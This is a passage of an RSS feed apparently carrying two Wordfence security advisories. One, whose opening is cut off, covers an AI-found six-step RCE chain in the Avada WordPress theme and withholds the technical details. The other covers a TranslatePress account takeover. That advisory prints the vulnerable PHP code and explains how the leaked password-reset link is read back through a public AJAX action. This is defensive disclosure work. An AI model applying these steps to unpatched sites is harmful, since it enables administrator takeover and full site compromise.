<p><strong>DEPTH for complexity: </strong><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Argus</a> is the depth-first half, and it’s the one that found the Avada chain. Both agents hunt the way every researcher does, tracing a dangerous operation backward to see whether anything untrusted can reach it, or following untrusted input forward to see what it can touch. What differs is how far down that trace they push. PRISM goes wide: it covers an enormous surface, which usually means each finding is anywhere from one to a few flaws or a short hop of a step or two, and that’s exactly the right trade-off, because most serious WordPress vulnerabilities look like that and you want to catch every one of them. Argus goes deep instead. It gives up the breadth to stay on one target and hold a long, multi-step path in view, the kind where the exploit only exists several links in and every link depends on the one before it.</p>
<p>Avada was that deep case: six separate weaknesses, none sufficient on its own to produce code execution, that only become a path from an anonymous request to code execution when you line them up in one exact order. We won’t claim a human could never have found it. Hand an experienced researcher the hint that an RCE is in there and a month to chase it, and maybe they connect all six links, maybe they don’t. What we can say is that Argus found the chain unattended in about two hours, and then did the part that usually costs a researcher days on its own: it wrote a working proof-of-concept, start to finish, that executes PHP code on the target server. A chain this deep, found and demonstrated that fast with nobody in the loop, is what starts to look like capability beyond what a person can practically bring to bear. <strong>Not because the bug was invisible, but because no human works that fast.</strong></p>
<p>We’re not going to publish how Argus is built. As <a href="https://www.wordfence.com/blog/2026/07/a-new-threat-landscape-meets-a-new-kind-of-defender/" target="_blank" rel="noopener">one of our recent blog posts</a> said, the leverage here isn’t really about any one model, it’s about harness and prompt engineering, about how you put a capable model to work. That’s our own R&amp;D, and the same techniques help an attacker just as much as they help us.</p>
<h2>Vulnerability Summary from Wordfence Intelligence</h2>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5bef5bd3-8ec9-4a5b-bcdd-98952c7ef390" target="_blank" rel="noopener">Avada &lt;= 7.16 and Fusion Builder &lt;= 3.16 &#8211; Unauthenticated Remote Code Execution via Arbitrary File Write</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18431" target="_blank" rel="noopener noreferrer">							CVE-2026-18431						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusion-builder" target="_blank" rel="noopener">Avada (Fusion) Builder</a> <span class="wfvr-software-slug">[fusion-builder]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/Avada" target="_blank" rel="noopener">Avada | Website Builder For WordPress &amp; WooCommerce</a> <span class="wfvr-software-slug">[Avada]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alex-thomas" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01c3929fe6b851d3cf7bda3c0215f691.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01c3929fe6b851d3cf7bda3c0215f691"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alex-thomas" target="_blank" rel="noopener">Alex Thomas</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f97767e14ecb84ebfb6efdeaad2ee129.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f97767e14ecb84ebfb6efdeaad2ee129"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a></div>
</p></div>
</p></div>
</p></div>
<div class="vulnerability-description">
			The Avada theme for WordPress is vulnerable to Arbitrary File Write in all versions up to, and including, 7.16 when the Fusion Builder plugin is installed and active in versions up to, and including, 3.16. This is due to a chain of authorization and input validation weaknesses across the two components that makes it possible for unauthenticated attackers to write attacker-controlled files to the server. This can be used to create and execute arbitrary PHP files, resulting in remote code execution and complete site compromise. Successful exploitation requires both Avada and Fusion Builder to be installed and active, as well as certain administrator-authored content to be present.		</div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5bef5bd3-8ec9-4a5b-bcdd-98952c7ef390" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<h2>The Chain</h2>
<p>Here’s a high-level overview. We are intentionally withholding additional technical details at this time:</p>
<ul>
<li><strong>A public-facing request exposed attacker-controlled input.</strong></li>
<li><strong>That input could reach internal behavior not intended for anonymous users.</strong></li>
<li><strong>A privileged component could be invoked outside its expected context.</strong></li>
<li><strong>Request data could influence trusted state for the duration of the request.</strong></li>
<li><strong>An administrative maintenance operation lacked sufficient authorization.</strong></li>
<li><strong>Its file-handling controls did not adequately constrain what could be written or where.</strong></li>
</ul>
<p>The completed chain allows attacker-controlled PHP to execute in the security context of the web server. Because every link is required, breaking any one of them blocks the demonstrated path. <strong>ThemeFusion’s patch addresses all six weaknesses</strong>, including the authorization, trust-boundary, and file-handling issues involved.</p>
<h2>Timeline</h2>
<div>
<div>
<div>2026-07-30</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Argus discovered and reproduced the vulnerability</div>
<div>We validated the vulnerability against an isolated target and confirmed the end-to-end proof of concept. Wordfence Premium, Wordfence Care, and Wordfence Response customers received a firewall rule the same day.</div>
</div>
</div>
<div>
<div>2026-08-05</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>We disclosed the vulnerability to ThemeFusion</div>
<div>Full disclosure details were sent to the vendor through our Wordfence Vulnerability Management Portal.</div>
</div>
</div>
<div>
<div>2026-08-10</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Vendor acknowledged the report</div>
<div>The ThemeFusion team acknowledged the vulnerability report.</div>
</div>
</div>
<div>
<div>2026-08-12</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Vendor submitted a pre-release patch</div>
<div>ThemeFusion provided the patched Avada and Fusion Builder packages for review.</div>
</div>
</div>
<div>
<div>2026-08-25</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Patched versions released</div>
<div>ThemeFusion released Avada 7.16.1 and Fusion Builder 3.16.1 to the public.</div>
</div>
</div>
<div>
<div>2026-08-29</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Wordfence Free firewall protection</div>
<div>Sites running the free version of Wordfence receive the same firewall protection.</div>
</div>
</div>
</div>
<div>
    <span><i></i> Wordfence action</span><br />
    <span><i></i> Vendor / external action</span>
</div>
<h2>Conclusion</h2>
<p>In this blog post, we detailed a critical vulnerability chain that results in remote code execution affecting the Avada theme in all versions up to, and including, 7.16 when used together with its bundled Fusion Builder plugin in all versions up to, and including, 3.16. This vulnerability allows unauthenticated threat actors to chain a series of individually minor weaknesses into arbitrary PHP code execution on the server, leading to complete site compromise. The vulnerability has been fully addressed in Avada 7.16.1 and Fusion Builder 3.16.1.</p>
<p>We encourage WordPress users to verify that their sites are updated to the latest patched versions of both the Avada theme and the Fusion Builder plugin as soon as possible, considering the critical nature of this vulnerability. Because Avada requires and ships with Fusion Builder, both should be updated together.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule protecting against known exploits targeting this vulnerability chain on July 30, 2026. Sites running the free version of Wordfence will receive the same protection 30 days later, on August 29, 2026.</p>
<p>If you know someone who uses Avada on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/08/wordfence-argus-finds-complex-6-step-critical-rce-in-avada-theme-with-1-million-sales/" target="_blank" rel="noopener">Wordfence Argus Finds Complex 6 Step Critical RCE in Avada Theme with 1 Million Sales</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>400,000 WordPress Sites Affected by Account Takeover Vulnerability in TranslatePress WordPress Plugin</title>
		<link>https://swiftupdates.ca/400000-wordpress-sites-affected-by-account-takeover-vulnerability-in-translatepress-wordpress-plugin/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Tue, 25 Aug 2026 15:39:32 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/400000-wordpress-sites-affected-by-account-takeover-vulnerability-in-translatepress-wordpress-plugin/</guid>

					<description><![CDATA[On August 11th, 2026, we received a submission for an Unauthenticated Account Takeover vulnerability in TranslatePress, a WordPress plugin with more than 400,000 active installations. This vulnerability makes it possible for unauthenticated attackers to obtain an administrator’s password reset link, reset the account’s password, and log in as that administrator, resulting in complete site takeover. [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>On August 11th, 2026, we received a submission for an Unauthenticated Account Takeover vulnerability in <a href="https://wordpress.org/plugins/translatepress-multilingual/" target="_blank" rel="noopener">TranslatePress</a>, a WordPress plugin with more than 400,000 active installations. This vulnerability makes it possible for unauthenticated attackers to obtain an administrator’s password reset link, reset the account’s password, and log in as that administrator, resulting in complete site takeover. It is important to note that the password reset key is only leaked if the target administrator’s profile language is set to a published secondary language.</p>
<p>Props to <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener">momopon1415</a> who discovered and responsibly reported this vulnerability through the Wordfence <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Bug Bounty Program</a>. This researcher earned a bounty of $975.00 for this discovery. Our mission is to secure WordPress through defense in depth, which is why we are investing in quality vulnerability research and collaborating with researchers of this caliber through our Bug Bounty Program. We are committed to making the WordPress ecosystem more secure through the detection and prevention of vulnerabilities, which is a critical element to the multi-layered approach to security.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule to protect against known exploits targeting this vulnerability in TranslatePress, hosted on WordPress.org, on August 13, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later on September 12, 2026. This firewall rule is scoped to version 3.3.1 of the plugin with the translatepress-multilingual slug.</p>
<p>We provided full disclosure details to the Cozmoslabs team through our <a href="https://www.wordfence.com/threat-intel/vendor/vulnerability-management-portal/" target="_blank" rel="noopener">Wordfence Vulnerability Management Portal</a> on August 12, 2026. The developer acknowledged the report on August 13, 2026, and released the fully patched version on the same day. We would like to commend the Cozmoslabs team for their prompt response and timely patch.</p>
<p>We urge users to update their sites to the latest patched version of TranslatePress, version 3.3.2 at the time of this publication, as soon as possible.</p>
<h2>Vulnerability Summary from Wordfence Intelligence</h2>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4f4ebf09-b089-4118-a0ee-399243253f9c" target="_blank" rel="noopener">TranslatePress – Multilingual &lt;= 3.3.1 &#8211; Unauthenticated Account Takeover via Password Reset Link Disclosure</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19632" target="_blank" rel="noopener noreferrer">							CVE-2026-19632						</a>					</strong>
				</div>
<div class="affected-versions">
					<span>Affected Version(s)</span><br />
											<strong>&lt;= 3.3.1</strong>
									</div>
<div class="patched-status">
					<span>Patched Version</span><br />
					<strong class="patched">3.3.2</strong>
				</div>
<div class="bounty">
					<span>Bounty</span><br />
					<strong>$975.00</strong>
				</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/translatepress-multilingual" target="_blank" rel="noopener">TranslatePress – Translate Multilingual sites with AI Translation</a> <span class="wfvr-software-slug">[translatepress-multilingual]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0f962dd7143eb1e6e46c9632a10cf4cf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0f962dd7143eb1e6e46c9632a10cf4cf"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener">momopon1415</a></div>
</p></div>
</p></div>
</p></div>
<div class="vulnerability-description">
			The TranslatePress – Translate Multilingual sites with AI Translation plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.3.1 via the &#8216;trp_get_translations_regular&#8217; AJAX action. This makes it possible for unauthenticated attackers to extract the raw administrator password-reset URL — including the plaintext reset key and login parameters stored in the translation dictionary table — enabling full administrator account takeover. This vulnerability is only exploitable when automatic string saving is enabled (the default setting) and the target administrator&#8217;s profile locale is set to a published secondary language, as these conditions cause the password-reset URL to be persisted as a translatable string in the secondary-language dictionary table.		</div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4f4ebf09-b089-4118-a0ee-399243253f9c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<h2>Technical Analysis</h2>
<p>TranslatePress is a popular WordPress plugin for building multilingual sites, allowing site owners to translate their content into one or more secondary languages. To support automatic translation, the plugin captures translatable strings as they are rendered and stores them in per-language dictionary tables in the database.</p>
<p>This vulnerability is the result of two behaviors that, when combined, expose an administrator’s password reset link to unauthenticated visitors.</p>
<p>The first is that the plugin translates outgoing emails. TranslatePress hooks into WordPress core’s <code>wp_mail()</code> function through the <code>wp_mail_filter()</code> function in the <code>TRP_Translation_Render</code> class, which switches to the recipient’s preferred language and passes the email’s subject and message through the plugin’s translation pipeline:</p>
<pre class="brush: php; first-line: 2343; title: ; notranslate">
public function wp_mail_filter( $args ) {
    if ( ! is_array( $args ) ) {
        return $args;
    }

    if ( empty( $args['to'] ) ) {
        return $args;
    }

    global $TRP_LANGUAGE;

    $initial_language = $TRP_LANGUAGE;

    $recipient = $args['to'];

    // Normalize $recipient to a single email string (first recipient only - that's the main one)
    if ( is_array( $recipient ) ) {
        $first = reset( $recipient );
        $recipient = is_string( $first ) ? $first : '';
    }

    $recipient = (string) $recipient;

    // Keep only the first comma-separated entry if multiple are present in the string
    $recipient = trim( strtok( $recipient, ',' ) );

    $did_switch_language = false;

    if ( $recipient !== '' ) {
        $did_switch_language = trp_switch_to_preffered_language( $recipient );
    }

    $whitelisted_shortcodes = apply_filters(
        'trp_whitelisted_shortcodes_for_wp_mail',
        array( 'trp_language', 'language-include', 'language-exclude' )
    );

    if ( array_key_exists( 'subject', $args ) ) {
        $args['subject'] = $this-&gt;translate_page(
            trp_do_these_shortcodes( $args['subject'], $whitelisted_shortcodes )
        );
    }

    if ( array_key_exists( 'message', $args ) ) {
        $args['message'] = $this-&gt;translate_page(
            trp_do_these_shortcodes( $args['message'], $whitelisted_shortcodes )
        );
    }

    if ( $did_switch_language ) {
        trp_restore_language();
    } else {
        // No preferred-language switch happened, so restore only the request language.
        $TRP_LANGUAGE = $initial_language;
    }

    return $args;
}
</pre>
<p>When an administrator whose profile language is set to a published secondary language requests a password reset, the reset email is processed by this filter. With automatic string saving enabled, the contents of the email, including the full password reset URL containing the plaintext reset key and login parameters, are persisted as a translatable string in that secondary language’s dictionary table.</p>
<p>The second behavior is that the plugin exposes a public AJAX action, trp_get_translations_regular, which is handled by the <code>get_translations()</code> function in the <code>TRP_Editor_Api_Regular_Strings</code> class and returns the dictionary rows.</p>
<pre class="brush: php; first-line: 35; title: ; notranslate">
public function get_translations() {
	if ( defined( 'DOING_AJAX' ) &amp;&amp; DOING_AJAX ) {
		check_ajax_referer( 'get_translations', 'security' );
		if ( isset( $_POST['action'] ) &amp;&amp; $_POST['action'] === 'trp_get_translations_regular' &amp;&amp; !empty( $_POST['language'] ) &amp;&amp; in_array( $_POST['language'], $this-&gt;settings['translation-languages'] ) ) {
			$originals = (empty($_POST['originals']) )? array() : json_decode(stripslashes($_POST['originals'])); /* phpcs:ignore */ /* sanitized downstream */
			$skip_machine_translation = (empty($_POST['skip_machine_translation']) )? array() : json_decode(stripslashes($_POST['skip_machine_translation'])); /* phpcs:ignore */ /* sanitized downstream */
			$ids = (empty($_POST['string_ids']) )? array() : json_decode(stripslashes($_POST['string_ids'])); /* phpcs:ignore */ /* sanitized downstream */
			if ( is_array( $skip_machine_translation ) ) {
                if ( is_array( $ids ) || is_array( $originals ) ) {
                    $trp = TRP_Translate_Press::get_trp_instance();
                    if ( !$this-&gt;trp_query ) {
                        $this-&gt;trp_query = $trp-&gt;get_component( 'query' );
                    }
                    if ( !$this-&gt;translation_manager ) {
                        $this-&gt;translation_manager = $trp-&gt;get_component( 'translation_manager' );
                    }
                    $block_type   = $this-&gt;trp_query-&gt;get_constant_block_type_regular_string();
                    $dictionaries = $this-&gt;get_translation_for_strings( $ids, $originals, $block_type, $skip_machine_translation );

                    $localized_text = $this-&gt;translation_manager-&gt;string_groups();
                    $string_group   = __( 'Others', 'translatepress-multilingual' ); // this type is not registered in the string types because it will be overwritten by the content in data-trp-node-type
                    if ( isset( $_POST['dynamic_strings'] ) &amp;&amp; $_POST['dynamic_strings'] === 'true' ) {
                        $string_group = $localized_text['dynamicstrings'];
                    }
                    $dictionary_by_original = trp_sort_dictionary_by_original( $dictionaries, 'regular', $string_group, sanitize_text_field( $_POST['language'] ) );

                    echo trp_safe_json_encode( $dictionary_by_original );//phpcs:ignore
                }
            }
		}
	}

	wp_die();
}
</pre>
<p>Because the handler accepts an attacker-supplied list of string IDs and returns the corresponding dictionary rows, an attacker can enumerate the secondary-language dictionary. If the administrator’s password reset URL is present in the dictionary, it is returned in plaintext, allowing the attacker to obtain and use the reset link.</p>
<p>By chaining these two behaviors, an unauthenticated attacker who knows an administrator’s username or email can first trigger a password reset for that administrator, then use the public AJAX action to read the reset URL out of the secondary-language dictionary. With the reset key, the attacker can set a new password for the administrator account and log in, taking full control of the site.</p>
<p>As with all account takeover vulnerabilities that result in administrator access, this can lead to complete site compromise. Once authenticated as an administrator, the attacker can create additional administrator accounts, install malicious plugins or themes containing backdoors, modify site content, or exfiltrate sensitive data.</p>
<h2>Important Note</h2>
<p>We would like to draw attention to the fact that the password reset URL is only leaked when the targeted administrator’s profile language is set to a published secondary language. If the administrator’s language is left as the site’s default language, their password reset email is never processed through the secondary-language translation pipeline, and the reset URL is therefore not persisted in a dictionary table that the public AJAX action can read.</p>
<h2>The Importance of Two-Factor Authentication</h2>
<p>While the most reliable way to protect your site against this vulnerability is to update to a patched version, this advisory is also a good reminder of why enabling two-factor authentication (2FA) on your administrator accounts is a valuable additional layer of defense. Vulnerabilities like this one allow an attacker to reset an administrator’s password, but a password alone is not enough to log in when 2FA is enabled. With two-factor authentication in place, an attacker who manages to change an administrator’s password would still be unable to access the account without the second authentication factor, such as a time-based one-time code from an authenticator app.</p>
<p>Wordfence includes built-in two-factor authentication, even in the free version, and we strongly recommend enabling it on all administrator accounts. Defense in depth means not relying on any single control: keeping your plugins updated, running a firewall, and enabling 2FA together give your site far stronger protection than any one measure on its own.</p>
<h2>The Importance of Passwordless Login with Passkeys</h2>
<p>Two-factor authentication is not the only way to strengthen your login security. Passkeys are a newer, even stronger option, and they are particularly relevant to a vulnerability like this one, which targets the traditional password-based login flow. A passkey is a passwordless credential based on the WebAuthn and FIDO2 standards, allowing a user to sign in using their device’s biometrics, such as a fingerprint or facial recognition, a device PIN, or a hardware security key, instead of a password.</p>
<p>Because a passkey is cryptographically bound to both the user’s device and the specific website it was created for, there is no shared secret that can be leaked, phished, or reset the way a password can. An attacker who obtains or resets a password gains far less, because the account is protected by a credential that never leaves the user’s device and cannot be reused on a different site. This makes passkeys inherently resistant to phishing and to the kind of credential-based attacks that account takeover vulnerabilities rely on. We covered the security advantages of passkeys in more detail in a dedicated article: <a href="https://www.wordfence.com/wordpress-password-security-why-passkeys-are-more-secure/" target="_blank" rel="noopener">WordPress Password Security: Why Passkeys Are More Secure</a>.</p>
<p>As of version 9.0, Wordfence includes built-in support for passkeys, even in the free version, giving you another, even stronger option for securing your login. We recommend setting them up on your administrator accounts as a modern alternative to password-based authentication.</p>
<h2>Wordfence Firewall</h2>
<p>The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability.</p>
<p><a href="https://www.wordfence.com/wp-content/uploads/2026/08/translatepress-multilingual-password-reset-key-disclosure-howto-wordfence-firewall.png" target="_blank" rel="noopener"><img loading="lazy" decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/08/translatepress-multilingual-password-reset-key-disclosure-howto-wordfence-firewall.png" alt="translatepress multilingual password reset key disclosure howto wordfence firewall" width="980" height="726" class="alignnone size-full wp-image-42790"></a></p>
<h2>Disclosure Timeline</h2>
<div>
<div>
<div>2026-08-11</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>We received the vulnerability submission</div>
<div>A security researcher submitted an unauthenticated account takeover vulnerability in TranslatePress through the Wordfence Bug Bounty Program.</div>
</div>
</div>
<div>
<div>2026-08-12</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>We validated the report and disclosed it to the vendor</div>
<div>Our team confirmed the proof of concept and sent full disclosure details to the developer through our Wordfence Vulnerability Management Portal.</div>
</div>
</div>
<div>
<div>2026-08-13</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>We deployed a firewall rule to Premium users<span>Firewall rule</span></div>
<div><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule to protect against known exploits targeting this vulnerability in TranslatePress, hosted on WordPress.org.</div>
</div>
</div>
<div>
<div>2026-08-13</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Vendor released patched version 3.3.2<span>Patch</span></div>
<div>The vendor acknowledged the report and released the fully patched version, 3.3.2.</div>
</div>
</div>
<div>
<div>2026-09-12</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>We will deploy the firewall rule to free users<span>Firewall rule</span></div>
<div>Sites using the free version of Wordfence will receive the same protection 30 days later.</div>
</div>
</div>
</div>
<div>
    <span><i></i> Wordfence action</span><br />
    <span><i></i> Vendor / external action</span>
</div>
<h2>Conclusion</h2>
<p>In this blog post, we detailed an Unauthenticated Account Takeover vulnerability within the <a href="https://wordpress.org/plugins/translatepress-multilingual/" target="_blank" rel="noopener">TranslatePress plugin</a> affecting all versions up to, and including, 3.3.1. This vulnerability allows unauthenticated threat actors to obtain an administrator’s password reset link from a secondary-language translation dictionary and take over the administrator account, leading to complete site compromise. The vulnerability has been fully addressed in version 3.3.2 of the plugin.</p>
<p>We encourage WordPress users to verify that their sites are updated to the latest patched version of TranslatePress as soon as possible considering the critical nature of this vulnerability.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule to protect against known exploits targeting this vulnerability in TranslatePress, hosted on WordPress.org, on August 13, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later on September 12, 2026.</p>
<p>If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/08/400000-wordpress-sites-affected-by-account-takeover-vulnerability-in-translatepress-wordpress-plugin/" target="_blank" rel="noopener">400,000 WordPress Sites Affected by Account Takeover Vulnerability in TranslatePress WordPress Plugin</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
